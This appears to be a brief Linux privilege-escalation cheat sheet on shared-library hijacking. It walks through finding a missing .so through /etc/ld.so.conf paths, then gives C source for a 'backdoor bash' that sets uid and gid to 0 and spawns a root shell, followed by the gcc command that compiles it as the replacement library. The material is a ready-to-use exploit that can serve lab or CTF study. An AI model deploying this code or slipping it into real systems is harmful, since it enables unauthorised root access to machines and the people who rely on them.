LD_Library

• Some binary might show missing library when attempted to run

• find the missing library $library.so

• Check files

  • /etc/ld.so.conf

  • /etc/ld.so.conf.d

• Check config file

  • vital.conf

  • /etc/ld.so.conf.d

• Check path vital.conf and if library is missing

strings $binary_file

• find the function and create a backdoor bash

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
void vital()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

• Compile

gcc exp.x -o missed.so -shared -Wall -fPIC -w

• Execute new binary

• $PROFIT$